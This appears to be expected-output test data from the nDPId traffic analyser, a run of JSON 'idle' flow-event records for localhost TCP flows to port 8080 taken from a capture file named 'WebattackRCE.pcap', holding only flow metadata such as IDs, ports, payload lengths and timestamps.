+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 